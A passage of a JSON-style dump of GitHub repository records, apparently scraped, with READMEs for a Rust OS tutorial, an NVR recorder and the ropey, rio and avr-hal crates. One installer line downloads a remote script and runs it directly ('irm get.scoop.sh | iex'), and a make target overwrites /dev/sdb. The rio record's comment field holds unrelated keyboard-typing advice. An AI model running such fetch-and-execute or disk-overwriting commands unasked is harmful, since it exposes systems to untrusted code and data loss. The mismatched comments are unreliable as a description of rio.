available and enter the user shell:\n\n```\n/**** APPS ****\nmpsc_sem\nusertests\npipetest\nforktest2\ncat\ninitproc\nrace_adder_loop\nthreads_arg\nrace_adder_mutex_spin\nrace_adder_mutex_blocking\nforktree\nuser_shell\nhuge_write\nrace_adder\nrace_adder_atomic\nthreads\nstack_overflow\nfiletest_simple\nforktest_simple\ncmdline_args\nrun_pipe_test\nforktest\nmatrix\nexit\nfantastic_text\nsleep_simple\nyield\nhello_world\npipe_large_test\nsleep\nphil_din_mutex\n**************/\nRust user shell\n>> \n```\n\nYou can run any application except for `initproc` and `user_shell` itself. To run an application, just input its filename and hit enter. `usertests` can run a bunch of applications, thus it is recommended.\n\nType `Ctrl+a` then `x` to exit Qemu.\n\n### K210\n\nBefore chapter 6, you do not need a SD card:\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run BOARD=k210\n```\n\nFrom chapter 6, before running the kernel, we should insert a SD card into PC and manually write the filesystem image to it:\n\n```sh\n$ cd rCore-Tutorial-v3/os\n$ make sdcard\n```\n\nBy default it will overwrite the device `/dev/sdb` which is the SD card, but you can provide another location. For example, `make sdcard SDCARD=/dev/sdc`.\n\nAfter that, remove the SD card from PC and insert it to the slot of K210. Connect the K210 to PC and then:\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run BOARD=k210\n```\n\nType `Ctrl+]` to disconnect from K210.\n\n\n## Show runtime debug info of OS kernel version\nThe branch of ch9-log contains a lot of debug info. You could try to run rcore tutorial \nfor understand the internal behavior of os kernel.\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ git checkout ch9-log\n$ make run\n......\n[rustsbi] RustSBI version 0.2.0-alpha.10, adapting to RISC-V SBI v0.3\n.______ __ __ _______.___________. _______..______ __\n| _ \\ | | | | / | | / || _ \\ | |\n| |_) | | | | | | (----`---| |----`| (----`| |_) || |\n| / | | | | \\ \\ | | \\ \\ | _ < | |\n| |\\ \\----.| `--' |.----) | | | .----) | | |_) || |\n| _| `._____| \\______/ |_______/ |__| |_______/ |______/ |__|\n\n[rustsbi] Implementation: RustSBI-QEMU Version 0.0.2\n[rustsbi-dtb] Hart count: cluster0 with 1 cores\n[rustsbi] misa: RV64ACDFIMSU\n[rustsbi] mideleg: ssoft, stimer, sext (0x222)\n[rustsbi] medeleg: ima, ia, bkpt, la, sa, uecall, ipage, lpage, spage (0xb1ab)\n[rustsbi] pmp0: 0x10000000 ..= 0x10001fff (rw-)\n[rustsbi] pmp1: 0x2000000 ..= 0x200ffff (rw-)\n[rustsbi] pmp2: 0xc000000 ..= 0xc3fffff (rw-)\n[rustsbi] pmp3: 0x80000000 ..= 0x8fffffff (rwx)\n[rustsbi] enter supervisor 0x80200000\n[KERN] rust_main() begin\n[KERN] clear_bss() begin\n[KERN] clear_bss() end\n[KERN] mm::init() begin\n[KERN] mm::init_heap() begin\n[KERN] mm::init_heap() end\n[KERN] mm::init_frame_allocator() begin\n[KERN] mm::frame_allocator::lazy_static!FRAME_ALLOCATOR begin\n......\n```\n\n## Rustdoc\n\nCurrently it can only help you view the code since only a tiny part of the code has been documented.\n\nYou can open a doc html of `os` using `cargo doc --no-deps --open` under `os` directory.\n\n### OS-API-DOCS\nThe API Docs for Ten OS\n1. [Lib-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch1/os/index.html)\n1. [Batch-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch2/os/index.html)\n1. 
[MultiProg-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch3-coop/os/index.html)\n1. [TimeSharing-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch3/os/index.html)\n1. [AddrSpace-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch4/os/index.html)\n1. [Process-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch5/os/index.html)\n1. [FileSystem-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch6/os/index.html)\n1. [IPC-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch7/os/index.html)\n1. [SyncMutex-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch8/os/index.html)\n1. [IODevice-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch9/os/index.html)\n\n## Working in progress\n\nOur first release 3.6.0 (chapter 1-9) has been published, and we are still working on it.\n\n* chapter 9: need more descripts about different I/O devices\n\nHere are the updates since 3.5.0:\n\n### Completed\n\n* [x] automatically clean up and rebuild before running our project on a different platform\n* [x] fix `power` series application in early chapters, now you can find modulus in the output\n* [x] use `UPSafeCell` instead of `RefCell` or `spin::Mutex` in order to access static data structures and adjust its API so that it cannot be borrowed twice at a time(mention `& .exclusive_access().task[0]` in `run_first_task`)\n* [x] move `TaskContext` into `TaskControlBlock` instead of restoring it in place on kernel stack(since ch3), eliminating annoying `task_cx_ptr2`\n* [x] replace `llvm_asm!` with `asm!`\n* [x] expand the fs image size generated by `rcore-fs-fuse` to 128MiB\n* [x] add a new test named `huge_write` which evaluates the fs performance(qemu\\~500KiB/s k210\\~50KiB/s)\n* [x] flush all block cache to disk after a fs transaction which involves write operation\n* [x] replace `spin::Mutex` with `UPSafeCell` before SMP chapter\n* [x] add codes for a new chapter about synchronization & mutual exclusion(uniprocessor only)\n* [x] bug fix: we should call `find_pte` rather than `find_pte_create` in `PageTable::unmap`\n* [x] clarify: \"check validity of level-3 pte in `find_pte` instead of checking it outside this function\" should not be a bug\n* [x] code of chapter 8: synchronization on a uniprocessor\n* [x] switch the code of chapter 6 and chapter 7\n* [x] support signal mechanism in chapter 7/8(only works for apps with a single thread)\n* [x] Add boards/ directory and support rustdoc, for example you can use `cargo doc --no-deps --open` to view the documentation of a crate\n* [x] code of chapter 9: device drivers based on interrupts, including UART, block, keyboard, mouse, gpu devices\n* [x] add CI autotest and doc in github \n### Todo(High priority)\n\n* [ ] review documentation, current progress: 8/9\n* [ ] use old fs image optionally, do not always rebuild the image\n* [ ] shell functionality improvement(to be continued...)\n* [ ] give every non-zero process exit code an unique and clear error type\n* [ ] effective error handling of mm module\n* [ ] add more os functions for understanding os conecpts and principles\n### Todo(Low priority)\n\n* [ ] rewrite practice doc and remove some inproper questions\n* [ ] provide smooth debug experience at a Rust source code level\n* [ ] format the code using official tools\n\n### Crates\n\nWe will add them later.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "scottlamb/moonfire-nvr", "link": 
"https://github.com/scottlamb/moonfire-nvr", "tags": ["nvr", "ip-camera", "rtsp", "video", "security-camera", "rust", "javascript", "camera"], "stars": 830, "description": "Moonfire NVR, a security camera network video recorder", "lang": "Rust", "repo_lang": "", "readme": "[![CI](https://github.com/scottlamb/moonfire-nvr/workflows/CI/badge.svg)](https://github.com/scottlamb/moonfire-nvr/actions?query=workflow%3ACI)\n\n* [Introduction](#introduction)\n* [Documentation](#documentation)\n\n# Introduction\n\nMoonfire NVR is an open-source security camera network video recorder, started\nby Scott Lamb <>. It saves H.264-over-RTSP streams from\nIP cameras to disk into a hybrid format: video frames in a directory on\nspinning disk, other data in a SQLite3 database on flash. It can construct\n`.mp4` files for arbitrary time ranges on-the-fly. It does not decode,\nanalyze, or re-encode video frames, so it requires little CPU. It handles six\n1080p/30fps streams on a [Raspberry Pi\n2](https://www.raspberrypi.org/products/raspberry-pi-2-model-b/), using\nless than 10% of the machine's total CPU.\n\n**Help wanted to make it great! Please see the [contributing\nguide](CONTRIBUTING.md).**\n\nSo far, the web interface is basic: a filterable list of video segments,\nwith support for trimming them to arbitrary time ranges. No scrub bar yet.\nThere's also an experimental live view UI.\n\n\n \n \n \n \n \n \n
\"list\"live
\n\nThere's no support yet for motion detection, no https/TLS support (you'll\nneed a proxy server, as described [here](guide/secure.md)), and only a\nconsole-based (rather than web-based) configuration UI.\n\nMoonfire NVR is currently at version 0.7.5. Until version 1.0, there will be no\ncompatibility guarantees: configuration and storage formats may change from\nversion to version. There is an [upgrade procedure](guide/schema.md) but it is\nnot for the faint of heart.\n\nI hope to add features such as video analytics. In time, we can build\na full-featured hobbyist-oriented multi-camera NVR that requires nothing but\na cheap machine with a big hard drive. There are many exciting techniques we\ncould use to make this possible:\n\n* avoiding CPU-intensive H.264 encoding in favor of simply continuing to use\n the camera's already-encoded video streams. Cheap IP cameras these days\n provide pre-encoded H.264 streams in both \"main\" (full-sized) and \"sub\"\n (lower resolution, compression quality, and/or frame rate) varieties. The\n \"sub\" stream is more suitable for fast computer vision work as well as\n remote/mobile streaming. Disk space these days is quite cheap (with 4 TB\n drives costing about $100), so we can afford to keep many camera-months\n of both streams on disk.\n* off-loading on-NVR analytics to an inexpensive USB or M.2 neural network\n accelerator and hardware H.264 decoders.\n* taking advantage of on-camera analytics. They're often not as accurate, but\n they're the best way to stretch very inexpensive NVR machines.\n\n# Documentation\n\n* [Contributing](CONTRIBUTING.md)\n* [License](LICENSE.txt) \u2014\n [GPL-3.0-or-later](https://spdx.org/licenses/GPL-3.0-or-later.html)\n with [GPL-3.0-linking-exception](https://spdx.org/licenses/GPL-3.0-linking-exception.html)\n for OpenSSL.\n* [Change log](CHANGELOG.md) / release notes.\n* [Guides](guide/), including:\n * [Installing](guide/install.md)\n * [Building from source](guide/build.md)\n * [Securing Moonfire NVR and exposing it to the Internet](guide/secure.md)\n * [UI Development](guide/developing-ui.md)\n * [Troubleshooting](guide/troubleshooting.md)\n* [References](ref/), including:\n * [Configuration file](ref/config.md)\n * [JSON API](ref/api.md)\n* [Design documents](design/)\n* [Wiki](https://github.com/scottlamb/moonfire-nvr/wiki) has hardware\n recommendations, notes on several camera models, etc. Please add more!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cessen/ropey", "link": "https://github.com/cessen/ropey", "tags": [], "stars": 827, "description": "A utf8 text rope for manipulating and editing large texts.", "lang": "Rust", "repo_lang": "", "readme": "# Ropey\n\n[![CI Build Status][github-ci-img]][github-ci]\n[![Latest Release][crates-io-badge]][crates-io-url]\n[![Documentation][docs-rs-img]][docs-rs-url]\n\nRopey is a utf8 text rope for Rust, designed to be the backing text-buffer for\napplications such as text editors. 
Ropey is fast, robust, and can handle huge\ntexts and memory-incoherent edits with ease.\n\n\n## Example Usage\n\n```rust\n// Load a text file.\nlet mut text = ropey::Rope::from_reader(\n File::open(\"my_great_book.txt\")?\n)?;\n\n// Print the 516th line (zero-indexed).\nprintln!(\"{}\", text.line(515));\n\n// Get the start/end char indices of the line.\nlet start_idx = text.line_to_char(515);\nlet end_idx = text.line_to_char(516);\n\n// Remove the line...\ntext.remove(start_idx..end_idx);\n\n// ...and replace it with something better.\ntext.insert(start_idx, \"The flowers are... so... dunno.\\n\");\n\n// Print the changes, along with the previous few lines for context.\nlet start_idx = text.line_to_char(511);\nlet end_idx = text.line_to_char(516);\nprintln!(\"{}\", text.slice(start_idx..end_idx));\n\n// Write the file back out to disk.\ntext.write_to(\n BufWriter::new(File::create(\"my_great_book.txt\")?)\n)?;\n```\n\n## When Should I Use Ropey?\n\nRopey is designed and built to be the backing text buffer for applications\nsuch as text editors, and its design trade-offs reflect that. Ropey is good\nat:\n\n- Handling frequent edits to medium-to-large texts. Even on texts that are\n multiple gigabytes large, edits are measured in single-digit microseconds.\n- Handling Unicode correctly. It is impossible to create invalid utf8 through\n Ropey, and all Unicode line endings are correctly tracked including CRLF.\n- Having flat, predictable performance characteristics. Ropey will never be\n the source of hiccups or stutters in your software.\n\nOn the other hand, Ropey is _not_ good at:\n\n- Handling texts smaller than a couple of kilobytes or so. That is to say,\n Ropey will handle them fine, but Ropey allocates space in kilobyte chunks,\n which introduces unnecessary bloat if your texts are almost always small.\n- Handling texts that are larger than available memory. Ropey is an in-memory\n data structure.\n- Getting the best performance for every possible use-case. Ropey puts work\n into tracking both line endings and unicode scalar values, which is\n performance overhead you may not need depending on your use-case.\n\nKeep this in mind when selecting Ropey for your project. Ropey is very good\nat what it does, but like all software it is designed with certain\napplications in mind.\n\n\n## Features\n\n### Strong Unicode support\nRopey's atomic unit of text is\n[Unicode scalar values](https://www.unicode.org/glossary/#unicode_scalar_value)\n(or [`char`](https://doc.rust-lang.org/std/primitive.char.html)s in Rust)\nencoded as utf8. All of Ropey's editing and slicing operations are done\nin terms of char indices, which prevents accidental creation of invalid\nutf8 data.\n\nRopey also supports converting between scalar value indices and utf16 code unit\nindices, for interoperation with external APIs that may still use utf16.\n\n### Line-aware\n\nRopey knows about line breaks, allowing you to index into and iterate over\nlines of text.\n\nThe line breaks Ropey recognizes are also configurable at build time via\nfeature flags. 
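For example (a minimal sketch; which line breaks are recognized depends on those features), the line-aware APIs let you index into lines and convert between line and char indices:\n\n```rust\nuse ropey::Rope;\n\nfn main() {\n    let text = Rope::from_str(\"Hello!\\nThis is a rope.\\nIt knows about lines.\\n\");\n\n    // count lines (a trailing newline implies a final, empty line)\n    assert_eq!(text.len_lines(), 4);\n\n    // fetch a line slice by index (zero-indexed)\n    assert_eq!(text.line(1), \"This is a rope.\\n\");\n\n    // convert between line and char indices\n    let start = text.line_to_char(2);\n    assert_eq!(text.char_to_line(start), 2);\n}\n```\n\n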
See Ropey's documentation for details.\n\n### Rope slices\n\nRopey has rope slices that allow you to work with just parts of a rope, using\nall the read-only operations of a full rope including iterators and making\nsub-slices.\n\n### Flexible APIs with low-level access\n\nAlthough Ropey is intentionally limited in scope, it also provides APIs for\nefficiently accessing and working with its internal text chunk\nrepresentation, allowing additional functionality to be efficiently\nimplemented by client code with minimal overhead.\n\n### Efficient\n\nRopey is fast and minimizes memory usage:\n\n- On a recent mobile i7 Intel CPU, Ropey performed over 1.8 million small\n incoherent insertions per second while building up a text roughly 100 MB\n large. Coherent insertions (i.e. all near the same place in the text) are\n even faster, doing the same task at over 3.3 million insertions per\n second.\n- Freshly loading a file from disk only incurs about 10% memory overhead. For\n example, a 100 MB text file will occupy about 110 MB of memory when loaded\n by Ropey.\n- Cloning ropes is _extremely_ cheap. Rope clones share data, so an initial\n clone only takes 8 bytes of memory. After that, memory usage will grow\n incrementally as the clones diverge due to edits.\n\n### Thread safe\n\nRopey ensures that even though clones share memory, everything is thread-safe.\nClones can be sent to other threads for both reading and writing.\n\n\n## Unsafe code\n\nRopey uses unsafe code to help achieve some of its space and performance\ncharacteristics. Although effort has been put into keeping the unsafe code\ncompartmentalized and making it correct, please be cautious about using Ropey\nin software that may face adversarial conditions.\n\nAuditing, fuzzing, etc. of the unsafe code in Ropey is extremely welcome.\nIf you find any unsoundness, _please_ file an issue! Also welcome are\nrecommendations for how to remove any of the unsafe code without introducing\nsignificant space or performance regressions, or how to compartmentalize the\nunsafe code even better.\n\n\n## License\n\nRopey is licensed under the MIT license (LICENSE.md or http://opensource.org/licenses/MIT)\n\n\n## Contributing\n\nContributions are absolutely welcome! 
However, please open an issue or email\nme to discuss larger changes, to avoid doing a lot of work that may get\nrejected.\n\nAn overview of Ropey's design can be found [here](https://github.com/cessen/ropey/blob/master/design/design.md).\n\nUnless you explicitly state otherwise, any contribution intentionally\nsubmitted for inclusion in Ropey by you will be licensed as above, without any additional terms or conditions.\n\n[crates-io-badge]: https://img.shields.io/crates/v/ropey.svg\n[crates-io-url]: https://crates.io/crates/ropey\n[github-ci-img]: https://github.com/cessen/ropey/workflows/ci/badge.svg\n[github-ci]: https://github.com/cessen/ropey/actions?query=workflow%3Aci\n[docs-rs-img]: https://docs.rs/ropey/badge.svg\n[docs-rs-url]: https://docs.rs/ropey\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spacejam/rio", "link": "https://github.com/spacejam/rio", "tags": ["io-uring", "io", "uring", "rust", "steamy", "linux"], "stars": 827, "description": "pure rust io_uring library, built on libc, thread & async friendly, misuse resistant", "lang": "Rust", "repo_lang": "", "readme": "* [documentation](https://docs.rs/rio)\n* [chat](https://discord.gg/Z6VsXds)\n* [sponsor](https://github.com/sponsors/spacejam)\n\n# rio\n\nbindings for io_uring, the hottest\nthing to happen to linux IO in a long time.\n\n#### Soundness status\n\nrio aims to leverage Rust's compile-time checks to be\nmisuse-resistant compared to io_uring interfaces in\nother languages, but users should beware that\n**use-after-free bugs are still possible without\n`unsafe` when using rio.** `Completion` borrows the\nbuffers involved in a request, and its destructor\nblocks in order to delay the freeing of those buffers\nuntil the corresponding request has completed; but it\nis considered safe in Rust for an object's lifetime\nand borrows to end without its destructor running,\nand this can happen in various ways, including\nthrough `std::mem::forget`. Be careful not to let\ncompletions leak in this way, and if Rust's soundness\nguarantees are important to you, you may want to\navoid this crate.\n\n#### Innovations\n\n* only relies on libc, no need for c/bindgen to\n complicate things, nobody wants that\n* the completions work great with threads or an\n async runtime (`Completion` implements Future)\n* uses Rust marker traits to guarantee that a buffer will never\n be written into unless it is writable memory. (prevents\n you from trying to write data into static read-only memory)\n* no need to mess with `IoSlice` / `libc::iovec` directly.\n rio maintains these in the background for you.\n* If left to its own devices, io_uring will allow you to\n submit more IO operations than would actually fit in\n the completion queue, allowing completions to be dropped\n and causing leaks of any userspace thing waiting for\n the completion. rio exerts backpressure on submitters\n when the number of in-flight requests reaches this\n threshold, to guarantee that no completions will\n be dropped due to completion queue overflow.\n* rio will handle submission queue submissions\n automatically. If you start waiting for a\n `Completion`, rio will make sure that we\n have already submitted at least this request\n to the kernel. 
Other io_uring libraries force\n you to handle this manually, which is another\n possible source of misuse.\n\nThis is intended to be the core of [sled's](http://sled.rs) writepath.\nIt is built with a specific high-level\napplication in mind: a high performance storage\nengine and replication system.\n\n#### What's io_uring?\n\nio_uring is the biggest thing to happen to the\nlinux kernel in a very long time. It will change\neverything. Anything that uses epoll right now\nwill be rewritten to use io_uring if it wants\nto stay relevant. It started as a way to do real\nasync disk IO without needing to use O_DIRECT, but\nits scope has expanded and it will continue to support\nmore and more kernel functionality over time due to\nits ability to batch large numbers different syscalls.\nIn kernel 5.5 support is added for more networking\noperations like `accept(2)`, `sendmsg(2)`, and `recvmsg(2)`.\nIn 5.6 support is being added for `recv(2)` and `send(2)`.\nio_uring [has been measured to dramatically outperform\nepoll-based networking, with io_uring outperforming\nepoll-based setups more and more under heavier load](https://twitter.com/markpapadakis/status/1216978559601926145).\nI started rio to gain an early deep understanding of this\namazing new interface, so that I could use it ASAP and\nresponsibly with [sled](http://sled.rs).\n\nio_uring unlocks the following kernel features:\n\n* fully-async interface for a growing number of syscalls\n* async disk IO without using O_DIRECT as you have\n to do with AIO\n* batching hundreds of disk and network IO operations\n into a single syscall, which is especially wonderful\n in a post-meltdown/spectre world where our syscalls have\n [dramatically slowed down](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html)\n* 0-syscall IO operation submission, if configured in\n SQPOLL mode\n* configurable completion polling for trading CPU for\n low latency\n* Allows expression of sophisticated 0-copy broadcast\n semantics, similar to splice(2) or sendfile(2) but\n working with many file-like objects without ever\n needing to bounce memory and mappings into userspace\n en-route.\n* Allows IO buffers and file descriptors to be registered\n for cheap reuse (remapping buffers and file descriptors\n for use in the kernel has a significant cost).\n\nTo read more about io_uring, check out:\n\n* [Ringing in a new asynchronous I/O API](https://lwn.net/Articles/776703/)\n* [Efficient IO with io_uring](https://kernel.dk/io_uring.pdf)\n* [What\u2019s new with io_uring](https://kernel.dk/io_uring-whatsnew.pdf)\n* Follow [Jens Axboe on Twitter](https://twitter.com/axboe) to follow dev progress\n\nFor some slides with interesting io_uring performance results,\ncheck out slides 43-53 of [this presentation deck by Jens](https://www.slideshare.net/ennael/kernel-recipes-2019-faster-io-through-iouring).\n\n#### why not use those other Rust io_uring libraries?\n\n* they haven't copied `rio`'s features yet, which you pretty much\n have to use anyway to responsibly use `io_uring` due to the\n sharp edges of the API. 
All of the libraries I've seen\n as of January 13 2020 are totally easy to overflow the\n completion queue with, as well as easy to express\n use-after-frees with, don't seem to be async-friendly,\n etc...\n\n#### examples that will be broken in the next day or two\n\nasync tcp echo server:\n\n```rust\nuse std::{\n io::self,\n net::{TcpListener, TcpStream},\n};\n\nasync fn proxy(ring: &rio::Rio, a: &TcpStream, b: &TcpStream) -> io::Result<()> {\n let buf = vec![0_u8; 512];\n loop {\n let read_bytes = ring.read_at(a, &buf, 0).await?;\n let buf = &buf[..read_bytes];\n ring.write_at(b, &buf, 0).await?;\n }\n}\n\nfn main() -> io::Result<()> {\n let ring = rio::new()?;\n let acceptor = TcpListener::bind(\"127.0.0.1:6666\")?;\n\n extreme::run(async {\n // kernel 5.5 and later support TCP accept\n loop {\n let stream = ring.accept(&acceptor).await?;\n dbg!(proxy(&ring, &stream, &stream).await);\n }\n })\n}\n```\n\nfile reading:\n\n```rust\nlet ring = rio::new().expect(\"create uring\");\nlet file = std::fs::open(\"file\").expect(\"openat\");\nlet data: &mut [u8] = &mut [0; 66];\nlet completion = ring.read_at(&file, &mut data, at);\n\n// if using threads\ncompletion.wait()?;\n\n// if using async\ncompletion.await?\n```\n\nfile writing:\n\n```rust\nlet ring = rio::new().expect(\"create uring\");\nlet file = std::fs::create(\"file\").expect(\"openat\");\nlet to_write: &[u8] = &[6; 66];\nlet completion = ring.write_at(&file, &to_write, at);\n\n// if using threads\ncompletion.wait()?;\n\n// if using async\ncompletion.await?\n```\n\nspeedy O_DIRECT shi0t (try this at home / run the o_direct example)\n\n```rust\nuse std::{\n fs::OpenOptions, io::Result,\n os::unix::fs::OpenOptionsExt,\n};\n\nconst CHUNK_SIZE: u64 = 4096 * 256;\n\n// `O_DIRECT` requires all reads and writes\n// to be aligned to the block device's block\n// size. 4096 might not be the best, or even\n// a valid one, for yours!\n#[repr(align(4096))]\nstruct Aligned([u8; CHUNK_SIZE as usize]);\n\nfn main() -> Result<()> {\n // start the ring\n let ring = rio::new()?;\n\n // open output file, with `O_DIRECT` set\n let file = OpenOptions::new()\n .read(true)\n .write(true)\n .create(true)\n .truncate(true)\n .custom_flags(libc::O_DIRECT)\n .open(\"file\")?;\n\n let out_buf = Aligned([42; CHUNK_SIZE as usize]);\n let out_slice: &[u8] = &out_buf.0;\n\n let in_buf = Aligned([42; CHUNK_SIZE as usize]);\n let in_slice: &[u8] = &in_buf.0;\n\n let mut completions = vec![];\n\n for i in 0..(10 * 1024) {\n let at = i * CHUNK_SIZE;\n\n // By setting the `Link` order,\n // we specify that the following\n // read should happen after this\n // write.\n let write = ring.write_at_ordered(\n &file,\n &out_slice,\n at,\n rio::Ordering::Link,\n );\n completions.push(write);\n\n let read = ring.read_at(&file, &in_slice, at);\n completions.push(read);\n }\n\n for completion in completions.into_iter() {\n completion.wait()?;\n }\n\n Ok(())\n}\n```\n", "readme_type": "markdown", "hn_comments": "I am a Dvorak touchtypist, this was literally my first skill I developed during my study in university. I can predict that relearning from qwerty to Dvorak or Dvorak for programmers will be very painful for someone in his mid-thirties, but since you are going to train yourself with typing anyway, I recommend you to start from Dvorak and continue with qwerty if the pain will be really unbearable. 
There is nothing good in qwerty except for the super handy placement of the Cut, Copy, Paste, Save and Select All operations - you know, a lot of people just have no requirements for a typing setup other than handy copy-pasting.Also, you might consider starting to play some music to develop your fingers. For me, playing an upright piano was another step in mastering my keyboard skills, because it involves all 10 fingers and an upright piano is significantly harder to press than a grand piano or (especially) a synthesizer.Your ring finger issue looks very strange to me. I have noticed that nowadays nobody presses a doorbell button with their ring finger anymore, probably because of smartphones.add: If this is not obvious from my comment, I want this to be obvious: download any keyboard training software or use this kind of website. The only requirement is the ability to start from 4 letters.I learned to touch type at a young age, using a book my grandmother used to teach herself:https://www.etsy.com/market/gregg_typing_manualPut your hands on asdf and jkl; and just start typing random combinations of those letters without looking until you know what letters/fingers to use. Then you gradually expand, first to g and h, then to nearby letters in the row above and below, then to numbers and symbols.Some other tips:- don't smash the keys; practice using as little force as necessary, because the impact at the bottom of the key travel is going to cause finger strain- use your right ring finger for backspace by twisting your wrist slightly. Don't use the pinky, because you either have to stretch it or move your arm. I use my left ring finger for tab for the same reason, although it's closer and the pinky is not horrible- don't worry about keeping all your fingers on the home row when reaching for numbers. It's better to move your hand a bit, for example, to press 1, rather than stretch your fingers. Or you can curl your fingers and move your hand up. If you feel your fingers stretching/straining, it will cause fatigue and/or carpal tunnel.- you just have to commit to spending time to learn to touch type. You can start by using your thumb for the spacebar, not your right index finger!I'm using the HHKB JP layout, which is not ortholinear but has a smaller spacebar, and therefore more thumb keys available for ctrl, alt, cmd, etc.https://www.pfu.fujitsu.com/direct/hhkb/detail_hhkb-pro-jp.h...I also use a Kinesis at the office, which has better ergonomics but worse portability.https://kinesis-ergo.com/shop/advantage2/I love my dactyl manuform to bits. Is there a more specific question?No offense, but this is not a technology fix; this is a get-real-exercise-and-be-healthier fix. Do it now before you get older and things get harder to fix using mother nature.Your body was not designed to sit and type for 10 hours, even with breaks. You need to move and use your entire body to do something physical.Try weightlifting with a trainer or a trusted friend who knows what they are doing. Go for a hike, not a walk, or look up full-body calisthenic workouts on youtube. You can do those with no equipment.You could have an Embody chair and a self-adjusting perfect desk and keyboard and you will still hurt doing what you are doing. 
Please take this as a positive nudge towards becoming healthier.Clickable URL: http://www.masswerk.at/spacewar", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Rahix/avr-hal", "link": "https://github.com/Rahix/avr-hal", "tags": ["rust-embedd", "rust", "arduino", "avr", "hal-crates"], "stars": 827, "description": "embedded-hal abstractions for AVR microcontrollers", "lang": "Rust", "repo_lang": "", "readme": "avr-hal ![Continuous Integration](https://github.com/Rahix/avr-hal/workflows/Continuous%20Integration/badge.svg) [![arduino-hal docs](https://img.shields.io/badge/docs-arduino--hal-4d76ae)][arduino-hal docs] [![atmega-hal docs](https://img.shields.io/badge/docs-atmega--hal-4d76ae)][atmega-hal docs] [![attiny-hal docs](https://img.shields.io/badge/docs-attiny--hal-4d76ae)][attiny-hal docs]\n=======\nHardware Abstraction Layer for AVR microcontrollers and common boards (for example Arduino). Based on the [`avr-device`](https://github.com/Rahix/avr-device) crate.\n\n## Quickstart\nYou need a nightly Rust compiler for compiling Rust code for AVR. The correct version will be installed automatically due to the `rust-toolchain.toml` file.\n\nInstall dependencies:\n\n- Ubuntu\n ```bash\n sudo apt install avr-libc gcc-avr pkg-config avrdude libudev-dev build-essential\n ```\n- macOS\n ```bash\n xcode-select --install # if you haven't already done so\n brew tap osx-cross/avr\n brew install avr-gcc avrdude\n ```\n- Windows\n\n Install [Scoop](https://scoop.sh/) using PowerShell\n ```PowerShell\n Set-ExecutionPolicy RemoteSigned -Scope CurrentUser # Needed to run a remote script the first time\n irm get.scoop.sh | iex\n ```\n Install avr-gcc and avrdude\n ```\n scoop install avr-gcc\n scoop install avrdude\n ```\n See [Setting up environment](https://github.com/Rahix/avr-hal/wiki/Setting-up-environment) for more information.\n\nNext, install [\"ravedude\"](./ravedude), a tool which seamlessly integrates flashing your board into the usual cargo workflow:\n\n```bash\ncargo +stable install ravedude\n```\n\nGo into `./examples/arduino-uno` (or the directory for whatever board you want), and run the following commands:\n\n```bash\ncd examples/arduino-uno\n\n# Build and run it on a connected board\ncargo run --bin uno-blink\n```\n\n## Starting your own project\nThe best way to start your own project is via the [`avr-hal-template`](https://github.com/Rahix/avr-hal-template) which you can easily use with [`cargo-generate`](https://github.com/cargo-generate/cargo-generate):\n\n```bash\ncargo install cargo-generate\ncargo generate --git https://github.com/Rahix/avr-hal-template.git\n```\n\n## Repository Structure\nThe `avr-hal` repository is a workspace containing all components making up the HAL. Here is an overview:\n\n### `arduino-hal` [![arduino-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][arduino-hal docs]\n`arduino-hal` is the batteries-included HAL for all Arduino & similar boards. This is what you probably want to use for your projects. It is intentionally built to abstract away the differences between boards as much as possible.\n\n### `examples/*`\nThe [examples directory](./examples) contains lots of examples for common hardware. Do note that not all examples were ported to all boards, but there is a good chance that you can still use the code. 
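To give a flavor of what these examples look like, here is a minimal LED-blink sketch for an Arduino Uno (a rough sketch based on the `arduino-hal` API, assuming the `panic-halt` crate for the panic handler as in the template; the repository's own `uno-blink` example may differ slightly):\n\n```rust\n#![no_std]\n#![no_main]\n\nuse panic_halt as _;\n\n#[arduino_hal::entry]\nfn main() -> ! {\n // Take ownership of the device peripherals and grab the board's pins.\n let dp = arduino_hal::Peripherals::take().unwrap();\n let pins = arduino_hal::pins!(dp);\n\n // On an Arduino Uno, the built-in LED is wired to digital pin 13.\n let mut led = pins.d13.into_output();\n\n loop {\n led.toggle();\n arduino_hal::delay_ms(500);\n }\n}\n```\n\nWith ravedude set up, `cargo run` will build a program like this, flash it to a connected board and open a serial console. 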
Currently, the [Arduino Uno](./examples/arduino-uno/) crate contains the most examples.\n\n### `mcu/atmega-hal` [![atmega-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][atmega-hal docs] , `mcu/attiny-hal` [![attiny-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][attiny-hal docs]\nHAL crates for AVR microcontroller families. If you have a custom board, you'll want to work with these crates. Please check their documentation for a list of supported MCUs.\n\n### `avr-hal-generic` [![avr-hal-generic docs](https://img.shields.io/badge/docs-git-4d76ae)][avr-hal-generic docs]\nThis is a generic crate containing most of the HAL implementations in the form of macros which are instantiated in each HAL crate for the specific MCUs. If you intend to write drivers that work with any AVR chip, targeting `avr-hal-generic` is probably the best route.\n\n### `avr-specs/`\nThe `avr-specs/` directory contains rustc target definitions for all supported microcontrollers. You will need these for compiling Rust code for AVR. The [`avr-hal-template`](https://github.com/Rahix/avr-hal-template) already includes them for convenience.\n\n### 